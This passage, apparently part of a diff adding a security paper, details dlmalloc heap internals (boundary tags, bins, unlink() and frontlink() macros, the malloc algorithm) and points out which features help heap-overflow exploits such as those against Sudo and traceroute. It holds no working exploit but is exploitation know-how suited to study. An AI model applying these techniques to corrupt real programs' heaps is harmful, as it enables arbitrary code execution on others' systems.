+tunable malloc ever written. However it is among the fastest while also
+being among the most space-conserving, portable and tunable. Consistent
+balance across these factors results in a good general-purpose allocator
+for malloc-intensive programs."
+
+------[ 3.1.1 - Goals ]-------------------------------------------------
+
+The main design goals for this allocator are maximizing compatibility,
+maximizing portability, minimizing space, minimizing time, maximizing
+tunability, maximizing locality, maximizing error detection, minimizing
+anomalies. Some of these design goals are critical when it comes to
+damaging the heap and exploiting malloc calls afterwards:
+
+- Maximizing portability: "conformance to all known system constraints
+on alignment and addressing rules." As detailed in 3.2.2 and 3.3.2, 8
+byte alignment is currently hardwired into the design of dlmalloc. This
+is one of the main characteristics to permanently keep in mind.
+
+- Minimizing space: "The allocator [...] should maintain memory in ways
+that minimize fragmentation -- holes in contiguous chunks of memory that
+are not used by the program." But holes are sometimes needed in order to
+successfully attack programs which corrupt the heap (Sudo for example).
+
+- Maximizing tunability: "Optional features and behavior should be
+controllable by users". Environment variables like MALLOC_TOP_PAD_ alter
+the functioning of dlmalloc and could therefore aid in exploiting malloc
+calls. Unfortunately they are not loaded when a SUID or SGID program is
+run.
+
+- Maximizing locality: "Allocating chunks of memory that are typically
+used together near each other." The Sudo exploit for example heavily
+relies on this feature to reliably create holes in the memory managed by
+dlmalloc.
+
+- Maximizing error detection: "allocators should provide some means
+for detecting corruption due to overwriting memory, multiple frees,
+and so on." Luckily for the attacker who smashes the heap in order to
+execute arbitrary code, the GNU C Library does not activate these error
+detection mechanisms (the MALLOC_DEBUG compile-time option and the
+malloc debugging hooks (__malloc_hook, __free_hook, etc)) by default.
+
+------[ 3.1.2 - Algorithms ]--------------------------------------------
+
+"While coalescing via boundary tags and best-fit via binning represent
+the main ideas of the algorithm, further considerations lead to a
+number of heuristic improvements. They include locality preservation,
+wilderness preservation, memory mapping".
+
+--------[ 3.1.2.1 - Boundary tags ]-------------------------------------
+
+The chunks of memory managed by Doug Lea's Malloc "carry around with
+them size information fields both before and after the chunk. This
+allows for two important capabilities:
+
+- Two bordering unused chunks can be coalesced into one larger chunk.
+This minimizes the number of unusable small chunks.
+
+- All chunks can be traversed starting from any known chunk in either a
+forward or backward direction."
+
+The presence of such a boundary tag (the structure holding the said
+information fields, detailed in 3.3) between each chunk of memory comes
+as a godsend to the attacker who tries to exploit heap mismanagement.
+Indeed, boundary tags are control structures located in the very middle
+of a potentially corruptible memory area (the heap), and if the attacker
+manages to trick dlmalloc into processing a carefully crafted fake
+(or altered) boundary tag, they should be able to eventually execute
+arbitrary code.
+
+For example, the attacker could overflow a buffer dynamically allocated
+by malloc(3) and overwrite the next contiguous boundary tag (Netscape
+browsers exploit), or underflow such a buffer and overwrite the boundary
+tag stored just before (Secure Locate exploit), or cause the vulnerable
+program to perform an incorrect free(3) call (LBNL traceroute exploit)
+or multiple frees, or overwrite a single byte of a boundary tag with a
+NUL byte (Sudo exploit), and so on:
+
+http://www.openwall.com/advisories/OW-002-netscape-jpeg.txt
+
+ftp://maxx.via.ecp.fr/dislocate/
+
+http://www.synnergy.net/downloads/exploits/traceroute-exp.txt
+ftp://maxx.via.ecp.fr/traceroot/
+
+--------[ 3.1.2.2 - Binning ]-------------------------------------------
+
+"Available chunks are maintained in bins, grouped by size." Depending on
+its size, a free chunk is stored by dlmalloc in the bin corresponding to
+the correct size range (bins are detailed in 3.4):
+
+- if the size of the chunk is 200 bytes for example, it is stored in the
+bin that holds the free chunks whose size is exactly 200 bytes;
+
+- if the size of the chunk is 1504 bytes, it is stored in the bin that
+holds the free chunks whose size is greater than or equal to 1472 bytes
+but less than 1536;
+
+- if the size of the chunk is 16392 bytes, it is stored in the bin that
+holds the free chunks whose size is greater than or equal to 16384 bytes
+but less than 20480;
+
+- and so on (how these ranges are computed and how the correct bin is
+chosen is detailed in 3.4.1).
+
+"Searches for available chunks are processed in smallest-first,
+best-fit order. [...] Until the versions released in 1995, chunks were
+left unsorted within bins, so that the best-fit strategy was only
+approximate. More recent versions instead sort chunks by size within
+bins, with ties broken by an oldest-first rule."
+
+These algorithms are implemented via the chunk_alloc() function (called
+by malloc(3) for example) and the frontlink() macro, detailed in 3.5.1
+and 3.4.2.
+
+--------[ 3.1.2.3 - Locality preservation ]-----------------------------
+
+"In the current version of malloc, a version of next-fit is used only
+in a restricted context that maintains locality in those cases where it
+conflicts the least with other goals: If a chunk of the exact desired
+size is not available, the most recently split-off space is used (and
+resplit) if it is big enough; otherwise best-fit is used."
+
+This characteristic, implemented within the chunk_alloc() function,
+proved to be essential to the Sudo exploit. Thanks to this feature,
+the exploit could channel a whole series of malloc(3) calls within a
+particular free memory area, and could therefore protect another free
+memory area that had to remain untouched (and would otherwise have been
+allocated during the best-fit step of the malloc algorithm).
+
+--------[ 3.1.2.4 - Wilderness preservation ]---------------------------
+
+"The wilderness (so named by Kiem-Phong Vo) chunk represents the space
+bordering the topmost address allocated from the system. Because it is
+at the border, it is the only chunk that can be arbitrarily extended
+(via sbrk in Unix) to be bigger than it is (unless of course sbrk fails
+because all memory has been exhausted).
+
+One way to deal with the wilderness chunk is to handle it about the same
+way as any other chunk. [...] A better strategy is currently used: treat
+the wilderness chunk as bigger than all others, since it can be made so
+(up to system limitations) and use it as such in a best-first scan. This
+results in the wilderness chunk always being used only if no other chunk
+exists, further avoiding preventable fragmentation."
+
+The wilderness chunk is one of the most dangerous opponents of the
+attacker who tries to exploit heap mismanagement. Because this chunk
+of memory is handled specially by the dlmalloc internal routines (as
+detailed in 3.5), the attacker will rarely be able to execute arbitrary
+code if they solely corrupt the boundary tag associated with the
+wilderness chunk.
+
+--------[ 3.1.2.5 - Memory mapping ]------------------------------------
+
+"In addition to extending general-purpose allocation regions via sbrk,
+most versions of Unix support system calls such as mmap that allocate
+a separate non-contiguous region of memory for use by a program. This
+provides a second option within malloc for satisfying a memory request.
+[...] the current version of malloc relies on mmap only if (1) the
+request is greater than a (dynamically adjustable) threshold size
+(currently by default 1MB) and (2) the space requested is not already
+available in the existing arena so would have to be obtained via sbrk."
+
+For these two reasons, and because the environment variables that alter
+the behavior of the memory mapping mechanism (MALLOC_MMAP_THRESHOLD_
+and MALLOC_MMAP_MAX_) are not loaded when a SUID or SGID program is
+run, a perfect knowledge of how the memory mapping feature works is
+not mandatory when abusing malloc calls. However, it will be discussed
+briefly in 3.3.4 and 3.5.
+
+----[ 3.2 - Chunks of memory ]------------------------------------------
+
+The heap is divided by Doug Lea's Malloc into contiguous chunks of
+memory. The heap layout evolves when malloc functions are called (chunks
+may get allocated, freed, split, coalesced) but all procedures maintain
+the invariant that no free chunk physically borders another one (two
+bordering unused chunks are always coalesced into one larger chunk).
+
+------[ 3.2.1 - Synopsis of public routines ]---------------------------
+
+The chunks of memory managed by dlmalloc are allocated and freed via
+four main public routines:
+
+- "malloc(size_t n); Return a pointer to a newly allocated chunk of at
+least n bytes, or null if no space is available."
+
+The malloc(3) routine relies on the internal chunk_alloc() function
+mentioned in 3.1.2 and detailed in 3.5.1.
+
+- "free(Void_t* p); Release the chunk of memory pointed to by p, or no
+effect if p is null."
+
+The free(3) routine depends on the internal function chunk_free()
+presented in 3.5.2.
+
+- "realloc(Void_t* p, size_t n); Return a pointer to a chunk of size n
+that contains the same data as does chunk p up to the minimum of (n, p's
+size) bytes, or null if no space is available. The returned pointer may
+or may not be the same as p. If p is null, equivalent to malloc. Unless
+the #define REALLOC_ZERO_BYTES_FREES below is set, realloc with a size
+argument of zero (re)allocates a minimum-sized chunk."
+
+realloc(3) calls the internal function chunk_realloc() (detailed in
+3.5.3) that once again relies on chunk_alloc() and chunk_free(). As a
+side note, the GNU C Library defines REALLOC_ZERO_BYTES_FREES, so that
+realloc with a size argument of zero frees the allocated chunk p.
+
+- "calloc(size_t unit, size_t quantity); Returns a pointer to quantity *
+unit bytes, with all locations set to zero."
+
+calloc(3) behaves like malloc(3) (it calls chunk_alloc() in the very
+same manner) except that calloc(3) zeroes out the allocated chunk before
+it is returned to the user. calloc(3) is therefore not discussed in the
+present paper.
+
+------[ 3.2.2 - Vital statistics ]--------------------------------------
+
+When a user calls dlmalloc in order to allocate dynamic memory, the
+effective size of the chunk allocated (the number of bytes actually
+isolated in the heap) is never equal to the size requested by the user.
+This overhead is the result of the presence of boundary tags before and
+after the buffer returned to the user, and the result of the 8 byte
+alignment mentioned in 3.1.1.
+
+- Alignment:
+
+Since the size of a chunk is always a multiple of 8 bytes (how the
+effective size of a chunk is computed is detailed in 3.3.2) and since
+the very first chunk in the heap is 8 byte aligned, the chunks of memory
+returned to the user (and the associated boundary tags) are always
+aligned on addresses that are multiples of 8 bytes.
+
+- Minimum overhead per allocated chunk:
+
+Each allocated chunk has a hidden overhead of (at least) 4 bytes.
+The integer composed of these 4 bytes, a field of the boundary tag
+associated with each chunk, holds size and status information, and is
+detailed in 3.3.4.
+
+- Minimum allocated size:
+
+When malloc(3) is called with a size argument of zero, Doug Lea's Malloc
+actually allocates 16 bytes in the heap (the minimum allocated size, the
+size of a boundary tag).
+
+------[ 3.2.3 - Available chunks ]--------------------------------------
+
+Available chunks are kept in any of several places (all declared below):
+
+- the bins (mentioned in 3.1.2.2 and detailed in 3.4) exclusively hold
+free chunks of memory;
+
+- the top-most available chunk (the wilderness chunk presented in
+3.1.2.4) is always free and never included in any bin;
+
+- the remainder of the most recently split (non-top) chunk is always
+free and never included in any bin.
+
+----[ 3.3 - Boundary tags ]---------------------------------------------
+
+------[ 3.3.1 - Structure ]---------------------------------------------
+
+#define INTERNAL_SIZE_T size_t
+
+struct malloc_chunk {
+    INTERNAL_SIZE_T prev_size;
+    INTERNAL_SIZE_T size;
+    struct malloc_chunk * fd;
+    struct malloc_chunk * bk;
+};
+
+This structure, stored in front of each chunk of memory managed by Doug
+Lea's Malloc, is a representation of the boundary tags presented in
+3.1.2.1. The way its fields are used depends on whether the associated
+chunk is free or not, and whether the previous chunk is free or not.
+
+- An allocated chunk looks like this:
+
+    chunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+             | prev_size: size of the previous chunk, in bytes (used   |
+             | by dlmalloc only if this previous chunk is free)        |
+             +---------------------------------------------------------+
+             | size: size of the chunk (the number of bytes between    |
+             | "chunk" and "nextchunk") and 2 bits status information  |
+      mem -> +---------------------------------------------------------+
+             | fd: not used by dlmalloc because "chunk" is allocated   |
+             | (user data therefore starts here)                       |
+             + - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
+             | bk: not used by dlmalloc because "chunk" is allocated   |
+             | (there may be user data here)                           |
+             + - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
+             |                                                         .
+             .                                                         .
+             . user data (may be 0 bytes long)                         .
+             .                                                         .
+             .                                                         |
+nextchunk -> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+             | prev_size: not used by dlmalloc because "chunk" is      |
+             | allocated (may hold user data, to decrease wastage)     |
+             +---------------------------------------------------------+
+
+"chunk" is the front of the chunk (and therefore the front of the
+associated boundary tag) for the purpose of most of the dlmalloc code,
+"nextchunk" is the beginning of the next contiguous chunk, and "mem" is
+the pointer that is returned to the user (by malloc(3) or realloc(3) for
+example).
+
+The conversion from malloc headers ("chunk") to user pointers ("mem"),
+and back, is performed by two macros, chunk2mem() and mem2chunk(). They
+simply add or subtract 8 bytes (the size of the prev_size and size
+fields that separate "mem" from "chunk"):
+
+#define Void_t void
+#define SIZE_SZ sizeof(INTERNAL_SIZE_T)
+typedef struct malloc_chunk * mchunkptr;
+
+#define chunk2mem( p ) \
+    ( (Void_t *)((char *)(p) + 2*SIZE_SZ) )
+
+#define mem2chunk( mem ) \
+    ( (mchunkptr)((char *)(mem) - 2*SIZE_SZ) )
+
+Although a user should never utilize more bytes than they requested, the
+number of bytes reserved for the user by Doug Lea's Malloc may actually
+be greater than the amount of requested dynamic memory (because of the
+8 byte alignment). As a matter of fact, the memory area where the user
+could store data without corrupting the heap starts at "mem" and ends
+at (but includes) the prev_size field of "nextchunk" (indeed, this
+prev_size field is not used by dlmalloc (since "chunk" is allocated)
+and may thence hold user data, in order to decrease wastage), and is
+therefore (("nextchunk" + 4) - "mem") bytes long (the 4 additional bytes
+correspond to the size of this trailing prev_size field).
+
+But the size of this memory area, (("nextchunk" + 4) - "mem"), is also
+equal to (("nextchunk" + 4) - ("chunk" + 8)), which is of course equal
+to (("nextchunk" - "chunk") - 4). Since ("nextchunk" - "chunk") is the
+effective size of "chunk", the size of the memory area where the user
+could store data without corrupting the heap is equal to the effective
+size of the chunk minus 4 bytes.
+
+- Free chunks are stored in circular doubly-linked lists (described in
+3.4.2) and look like this:
+
+    chunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+             | prev_size: may hold user data (indeed, since "chunk" is |
+             | free, the previous chunk is necessarily allocated)      |
+             +---------------------------------------------------------+
+             | size: size of the chunk (the number of bytes between    |
+             | "chunk" and "nextchunk") and 2 bits status information  |
+             +---------------------------------------------------------+
+             | fd: forward pointer to the next chunk in the circular   |
+             | doubly-linked list (not to the next _physical_ chunk)   |
+             +---------------------------------------------------------+
+             | bk: back pointer to the previous chunk in the circular  |
+             | doubly-linked list (not the previous _physical_ chunk)  |
+             +---------------------------------------------------------+
+             |                                                         .
+             .                                                         .
+             . unused space (may be 0 bytes long)                      .
+             .                                                         .
+             .                                                         |
+nextchunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+             | prev_size: size of "chunk", in bytes (used by dlmalloc  |
+             | because this previous chunk is free)                    |
+             +---------------------------------------------------------+
+
+------[ 3.3.2 - Size of a chunk ]---------------------------------------
+
+When a user requests req bytes of dynamic memory (via malloc(3) or
+realloc(3) for example), dlmalloc first calls request2size() in order
+to convert req to a usable size nb (the effective size of the allocated
+chunk of memory, including overhead). The request2size() macro could
+just add 8 bytes (the size of the prev_size and size fields stored in
+front of the allocated chunk) to req and therefore look like this:
+
+#define request2size( req, nb ) \
+    ( nb = (req) + SIZE_SZ + SIZE_SZ )
+
+But this first version of request2size() is not optimal because it does
+not take into account the fact that the prev_size field of the next
+contiguous chunk can hold user data. The request2size() macro should
+therefore subtract 4 bytes (the size of this trailing prev_size field)
+from the previous result:
+
+#define request2size( req, nb ) \
+    ( nb = ((req) + SIZE_SZ + SIZE_SZ) - SIZE_SZ )
+
+This macro is of course equivalent to:
+
+#define request2size( req, nb ) \
+    ( nb = (req) + SIZE_SZ )
+
+Unfortunately this request2size() macro is not correct, because as
+mentioned in 3.2.2, the size of a chunk should always be a multiple of
+8 bytes. request2size() should therefore return the first multiple of 8
+bytes greater than or equal to ((req) + SIZE_SZ):
+
+#define MALLOC_ALIGNMENT ( SIZE_SZ + SIZE_SZ )
+#define MALLOC_ALIGN_MASK ( MALLOC_ALIGNMENT - 1 )
+
+#define request2size( req, nb ) \
+    ( nb = (((req) + SIZE_SZ) + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK )
+
+The request2size() function implemented in the Sudo exploit is alike but
+returns MINSIZE if the theoretic effective size of the chunk is less
+than MINSIZE bytes (the minimum allocatable size):
+
+#define MINSIZE sizeof(struct malloc_chunk)
+
+size_t request2size( size_t req )
+{
+    size_t nb;
+
+    nb = req + ( SIZE_SZ + MALLOC_ALIGN_MASK );
+    if ( nb < (MINSIZE + MALLOC_ALIGN_MASK) ) {
+        nb = MINSIZE;
+    } else {
+        nb &= ~MALLOC_ALIGN_MASK;
+    }
+    return( nb );
+}
+
+Finally, the request2size() macro implemented in Doug Lea's Malloc works
+likewise but adds an integer overflow detection:
+
+#define request2size(req, nb) \
+ ((nb = (req) + (SIZE_SZ + MALLOC_ALIGN_MASK)),\
+  ((long)nb <= 0 || nb < (INTERNAL_SIZE_T) (req) \
+   ? (__set_errno (ENOMEM), 1) \
+   : ((nb < (MINSIZE + MALLOC_ALIGN_MASK) \
+           ? (nb = MINSIZE) : (nb &= ~MALLOC_ALIGN_MASK)), 0)))
+
+------[ 3.3.3 - prev_size field ]---------------------------------------
+
+If the chunk of memory located immediately before a chunk p is allocated
+(how dlmalloc determines whether this previous chunk is allocated or not
+is detailed in 3.3.4), the 4 bytes corresponding to the prev_size field
+of the chunk p are not used by dlmalloc and may therefore hold user data
+(in order to decrease wastage).
+
+But if the chunk of memory located immediately before the chunk p is
+free, the prev_size field of the chunk p is used by dlmalloc and holds
+the size of that previous free chunk. Given a pointer to the chunk p,
+the address of the previous chunk can therefore be computed, thanks to
+the prev_chunk() macro:
+
+#define prev_chunk( p ) \
+    ( (mchunkptr)(((char *)(p)) - ((p)->prev_size)) )
+
+------[ 3.3.4 - size field ]--------------------------------------------
+
+The size field of a boundary tag holds the effective size (in bytes) of
+the associated chunk of memory and additional status information. This
+status information is stored within the 2 least significant bits, which
+would otherwise be unused (because as detailed in 3.3.2, the size of a
+chunk is always a multiple of 8 bytes, and the 3 least significant bits
+of a size field would therefore always be equal to 0).
+
+The low-order bit of the size field holds the PREV_INUSE bit and the
+second-lowest-order bit holds the IS_MMAPPED bit:
+
+#define PREV_INUSE 0x1
+#define IS_MMAPPED 0x2
+
+In order to extract the effective size of a chunk p from its size field,
+dlmalloc therefore needs to mask these two status bits, and uses the
+chunksize() macro for this purpose:
+
+#define SIZE_BITS ( PREV_INUSE | IS_MMAPPED )
+
+#define chunksize( p ) \
+    ( (p)->size & ~(SIZE_BITS) )
+
+- If the IS_MMAPPED bit is set, the associated chunk was allocated via
+the memory mapping mechanism described in 3.1.2.5. In order to determine
+whether a chunk of memory p was allocated via this mechanism or not,
+Doug Lea's Malloc calls chunk_is_mmapped():
+
+#define chunk_is_mmapped( p ) \
+    ( (p)->size & IS_MMAPPED )
+
+- If the PREV_INUSE bit of a chunk p is set, the physical chunk of
+memory located immediately before p is allocated, and the prev_size
+field of the chunk p may therefore hold user data. But if the PREV_INUSE
+bit is clear, the physical chunk of memory before p is free, and the
+prev_size field of the chunk p is therefore used by dlmalloc and
+contains the size of that previous physical chunk.
+
+Doug Lea's Malloc uses the macro prev_inuse() in order to determine
+whether the physical chunk located immediately before a chunk of memory
+p is allocated or not:
+
+#define prev_inuse( p ) \
+    ( (p)->size & PREV_INUSE )
+
+But in order to determine whether the chunk p itself is in use or not,
+dlmalloc has to extract the PREV_INUSE bit of the next contiguous chunk
+of memory:
+
+#define inuse( p ) \
+    (((mchunkptr)((char*)(p)+((p)->size&~PREV_INUSE)))->size&PREV_INUSE)
+
+----[ 3.4 - Bins ]------------------------------------------------------
+
+"Available chunks are maintained in bins, grouped by size", as mentioned
+in 3.1.2.2 and 3.2.3. The two exceptions are the remainder of the most
+recently split (non-top) chunk of memory and the top-most available
+chunk (the wilderness chunk) which are treated specially and never
+included in any bin.
+
+------[ 3.4.1 - Indexing into bins ]------------------------------------
+
+There are a lot of these bins (128), and depending on its size (its
+effective size, not the size requested by the user) a free chunk of
+memory is stored by dlmalloc in the bin corresponding to the right
+size range. In order to find out the index of this bin (the 128 bins
+are indeed stored in an array of bins), dlmalloc calls the macros
+smallbin_index() and bin_index().
+
+#define smallbin_index( sz ) \
+    ( ((unsigned long)(sz)) >> 3 )
+
+Doug Lea's Malloc considers the chunks whose size is less than 512 bytes
+to be small chunks, and stores these chunks in one of the 62 so-called
+small bins. Each small bin holds identically sized chunks, and because
+the minimum allocated size is 16 bytes and the size of a chunk is always
+a multiple of 8 bytes, the first small bin holds the 16 bytes chunks,
+the second one the 24 bytes chunks, the third one the 32 bytes chunks,
+and so on, and the last one holds the 504 bytes chunks. The index of the
+bin corresponding to the size sz of a small chunk is therefore (sz / 8),
+as implemented in the smallbin_index() macro.
+
+#define bin_index(sz)                                                     \
+((((unsigned long)(sz) >> 9) ==    0) ?       ((unsigned long)(sz) >>  3):\
+ (((unsigned long)(sz) >> 9) <=    4) ?  56 + ((unsigned long)(sz) >>  6):\
+ (((unsigned long)(sz) >> 9) <=   20) ?  91 + ((unsigned long)(sz) >>  9):\
+ (((unsigned long)(sz) >> 9) <=   84) ? 110 + ((unsigned long)(sz) >> 12):\
+ (((unsigned long)(sz) >> 9) <=  340) ? 119 + ((unsigned long)(sz) >> 15):\
+ (((unsigned long)(sz) >> 9) <= 1364) ? 124 + ((unsigned long)(sz) >> 18):\
+                                        126)
+
+The index of the bin corresponding to a chunk of memory whose size is
+greater than or equal to 512 bytes is obtained via the bin_index()
+macro. Thanks to bin_index(), the size range corresponding to each bin
+can be determined:
+
+- A free chunk whose size is equal to 1504 bytes for example is stored
+in the bin number 79 (56 + (1504 >> 6)) since (1504 >> 9) is equal to 2
+and therefore greater than 0 but less than or equal to 4. Moreover, the
+bin number 79 holds the chunks whose size is greater than or equal to
+1472 ((1504 >> 6) * 2^6) bytes but less than 1536 (1472 + 2^6).
+
+- A free chunk whose size is equal to 16392 bytes is stored in the bin
+number 114 (110 + (16392 >> 12)) since (16392 >> 9) is equal to 32 and
+therefore greater than 20 but less than or equal to 84. Moreover, the
+bin number 114 holds the chunks whose size is greater than or equal to
+16384 ((16392 >> 12) * 2^12) bytes but less than 20480 (16384 + 2^12).
+
+- And so on.
+
+------[ 3.4.2 - Linkin Park^H^H^H^H^Hg chunks in bin lists ]------------
+
+The free chunks of memory are stored in circular doubly-linked lists.
+There is one circular doubly-linked list per bin, and these lists are
+initially empty because at the start the whole heap is composed of one
+single chunk (never included in any bin), the wilderness chunk. A bin
+is nothing more than a pair of pointers (a forward pointer and a back
+pointer) serving as the head of the associated doubly-linked list.
+
+"The chunks in each bin are maintained in decreasing sorted order by
+size. This is irrelevant for the small bins, which all contain the
+same-sized chunks, but facilitates best-fit allocation for larger
+chunks."
+
+The forward pointer of a bin therefore points to the first (the largest)
+chunk of memory in the list (or to the bin itself if the list is empty),
+the forward pointer of this first chunk points to the second chunk in
+the list, and so on until the forward pointer of a chunk (the last chunk
+in the list) points to the bin again. The back pointer of a bin instead
+points to the last (the smallest) chunk of memory in the list (or to the
+bin itself if the list is empty), the back pointer of this chunk points
+to the previous chunk in the list, and so on until the back pointer of a
+chunk (the first chunk in the list) points to the bin again.
+
+- In order to take a free chunk p off its doubly-linked list, dlmalloc
+has to replace the back pointer of the chunk following p in the list
+with a pointer to the chunk preceding p in the list, and the forward
+pointer of the chunk preceding p in the list with a pointer to the chunk
+following p in the list. Doug Lea's Malloc calls the unlink() macro for
+this purpose:
+
+#define unlink( P, BK, FD ) {            \
+    BK = P->bk;                          \
+    FD = P->fd;                          \
+    FD->bk = BK;                         \
+    BK->fd = FD;                         \
+}
+
+- In order to place a free chunk P of size S in its bin (in the
+associated doubly-linked list actually), in size order, dlmalloc calls
+frontlink(). "Chunks of the same size are linked with the most recently
+freed at the front, and allocations are taken from the back. This
+results in LRU or FIFO allocation order", as mentioned in 3.1.2.2.
+
+The frontlink() macro calls smallbin_index() or bin_index() (presented
+in 3.4.1) in order to find out the index IDX of the bin corresponding
+to the size S, calls mark_binblock() in order to indicate that this bin
+is not empty anymore, calls bin_at() in order to determine the physical
+address of the bin, and finally stores the free chunk P at the right
+place in the doubly-linked list of the bin:
+
+#define frontlink( A, P, S, IDX, BK, FD ) {            \
+    if ( S < MAX_SMALLBIN_SIZE ) {                     \
+        IDX = smallbin_index( S );                     \
+        mark_binblock( A, IDX );                       \
+        BK = bin_at( A, IDX );                         \
+        FD = BK->fd;                                   \
+        P->bk = BK;                                    \
+        P->fd = FD;                                    \
+        FD->bk = BK->fd = P;                           \
+    } else {                                           \
+        IDX = bin_index( S );                          \
+        BK = bin_at( A, IDX );                         \
+        FD = BK->fd;                                   \
+        if ( FD == BK ) {                              \
+            mark_binblock(A, IDX);                     \
+        } else {                                       \
+            while ( FD != BK && S < chunksize(FD) ) {  \
+                FD = FD->fd;                           \
+            }                                          \
+            BK = FD->bk;                               \
+        }                                              \
+        P->bk = BK;                                    \
+        P->fd = FD;                                    \
+        FD->bk = BK->fd = P;                           \
+    }                                                  \
+}
+
+----[ 3.5 - Main public routines ]--------------------------------------
+
+The final purpose of an attacker who managed to smash the heap of a
+process is to execute arbitrary code. Doug Lea's Malloc can be tricked
+into achieving this goal after a successful heap corruption, either
+thanks to the unlink() macro, or thanks to the frontlink() macro, both
+presented above and detailed in 3.6. The following description of the
+malloc(3), free(3) and realloc(3) algorithms therefore focuses on these
+two internal macros.
+
+------[ 3.5.1 - The malloc(3) algorithm ]-------------------------------
+
+The malloc(3) function, named __libc_malloc() in the GNU C Library
+(malloc() is just a weak symbol) and mALLOc() in the malloc.c file,
+executes in the first place the code pointed to by __malloc_hook if
+this debugging hook is not equal to NULL (but it normally is). Next
+malloc(3) converts the amount of dynamic memory requested by the user
+into a usable form (via request2size() presented in 3.3.2), and calls
+the internal function chunk_alloc() that takes the first successful of
+the following steps:
+
+[1] - "The bin corresponding to the request size is scanned, and if a
+chunk of exactly the right size is found, it is taken."
+
+Doug Lea's Malloc considers a chunk to be "of exactly the right size" if
+the difference between its size and the request size is greater than or
+equal to 0 but less than MINSIZE bytes. If this difference was less than
+0 the chunk would not be big enough, and if the difference was greater
+than or equal to MINSIZE bytes (the minimum allocated size) dlmalloc
+could form a new chunk with this overhead and should therefore perform a
+split operation (not supported by this first step).
+
+[1.1] -- The case of a small request size (a request size is small if
+both the corresponding bin and the next bin are small (small bins are
+described in 3.4.1)) is treated separately:
+
+[1.1.1] --- If the doubly-linked list of the corresponding bin is not
+empty, chunk_alloc() selects the last chunk in this list (no traversal
+of the list and no size check are necessary for small bins since they
+hold identically sized chunks).
+
+[1.1.2] --- But if this list is empty, and if the doubly-linked list of
+the next bin is not empty, chunk_alloc() selects the last chunk in this
+list (the difference between the size of this chunk and the request size
+is indeed less than MINSIZE bytes (it is equal to 8 bytes, as detailed
+in 3.4.1)).
+
+[1.1.3] --- Finally, if a free chunk of exactly the right size was found
+and selected, chunk_alloc() calls unlink() in order to take this chunk
+off its doubly-linked list, and returns it to mALLOc(). If no such chunk
+was found, the step[2] is carried out.
+
+[1.2] -- If the request size is not small, the doubly-linked list of the
+corresponding bin is scanned. chunk_alloc() starts from the last (the
+smallest) free chunk in the list and follows the back pointer of each
+traversed chunk:
+
+[1.2.1] --- If during the scan a too big chunk is encountered (a chunk
+whose size is MINSIZE bytes or more greater than the request size), the
+scan is aborted since the next traversed chunks would be too big also
+(the chunks are indeed sorted by size within a doubly-linked list) and
+the step[2] is carried out.
+
+[1.2.2] --- But if a chunk of exactly the right size is found, unlink()
+is called in order to take it off its doubly-linked list, and the chunk
+is then returned to mALLOc(). If no big enough chunk was found at all
+during the scan, the step[2] is carried out.
+
+[2] - "The most recently remaindered chunk is used if it is big enough."
+
+But this particular free chunk of memory does not always exist: dlmalloc
+gives this special meaning (the `last_remainder' label) to a free chunk
+with the macro link_last_remainder(), and removes this special meaning
+with the macro clear_last_remainder(). So if one of the available free
+chunks is marked with the label `last_remainder':
+
+[2.1] -- It is divided into two parts if it is too big (if the
+difference between its size and the request size is greater than or
+equal to MINSIZE bytes). The first part (whose size is equal to the
+request size) is returned to mALLOc() and the second part becomes the
+new `last_remainder' (via link_last_remainder()).
+
+[2.2] -- But if the difference between the size of the `last_remainder'
+chunk and the request size is less than MINSIZE bytes, chunk_alloc()
+calls clear_last_remainder() and next:
+
+[2.2.1] --- Returns that most recently remaindered chunk (that just lost
+its label `last_remainder' because of the clear_last_remainder() call)
+to mALLOc() if it is big enough (if the difference between its size and
+the request size is greater than or equal to 0).
+
+[2.2.2] --- Or places this chunk in its doubly-linked list (thanks to
+the frontlink() macro) if it is too small (if the difference between its
+size and the request size is less than 0), and carries out the step[3].
+
+[3] - "Other bins are scanned in increasing size order, using a chunk
+big enough to fulfill the request, and splitting off any remainder."
+
+The scanned bins (the scan of a bin consists in traversing the
+associated doubly-linked list, starting from the last (the smallest)
+free chunk in the list, and following the back pointer of each traversed
+chunk) all correspond to sizes greater than or equal to the request size
+and are processed one by one (starting from the bin where the search at
+step[1] stopped) until a big enough chunk is found:
+
+[3.1] -- This big enough chunk is divided into two parts if it is too
+big (if the difference between its size and the request size is greater
+than or equal to MINSIZE bytes). The first part (whose size is equal to
+the request size) is taken off its doubly-linked list via unlink() and
+returned to mALLOc(). The second part becomes the new `last_remainder'
+via link_last_remainder().
+
+[3.2] -- But if a chunk of exactly the right size was found, unlink() is
+called in order to take it off its doubly-linked list, and the chunk is
+then returned to mALLOc(). If no big enough chunk was found at all, the
+step[4] is carried out.
+
+[4] - "If large enough, the chunk bordering the end of memory (`top') is
+split off."
+
+The chunk bordering the end of the heap (the wilderness chunk presented
+in 3.1.2.4) is large enough if the difference between its size and the
+request size is greater than or equal to MINSIZE bytes (the step[5]
+is otherwise carried out). The wilderness chunk is then divided into
+two parts: the first part (whose size is equal to the request size) is
+returned to mALLOc(), and the second part becomes the new wilderness
+chunk.
+
+[5] - "If the request size meets the mmap threshold and the system
+supports mmap, and there are few enough currently allocated mmapped
+regions, and a call to mmap succeeds, the request is allocated via
+direct memory mapping."
+
+Doug Lea's Malloc calls the internal function mmap_chunk() if the
+above conditions are fulfilled (the step[6] is otherwise carried out),
+but since the default value of the mmap threshold is rather large
+(128k), and since the MALLOC_MMAP_THRESHOLD_ environment variable
+cannot override this default value when a SUID or SGID program is run,
+mmap_chunk() is not detailed in the present paper.
+
+[6] - "Otherwise, the top of memory is extended by obtaining more space
+from the system (normally using sbrk, but definable to anything else via
+the MORECORE macro)."
+
+After a successful extension, the wilderness chunk is split off as it
+would have been at step[4], but if the extension fails, a NULL pointer
+is returned to mALLOc().
+
+------[ 3.5.2 - The free(3) algorithm ]---------------------------------
+
+The free(3) function, named __libc_free() in the GNU C Library (free()
+is just a weak symbol) and fREe() in the malloc.c file, executes in the
+first place the code pointed to by __free_hook if this debugging hook is
+not equal to NULL (but it normally is), and next distinguishes between
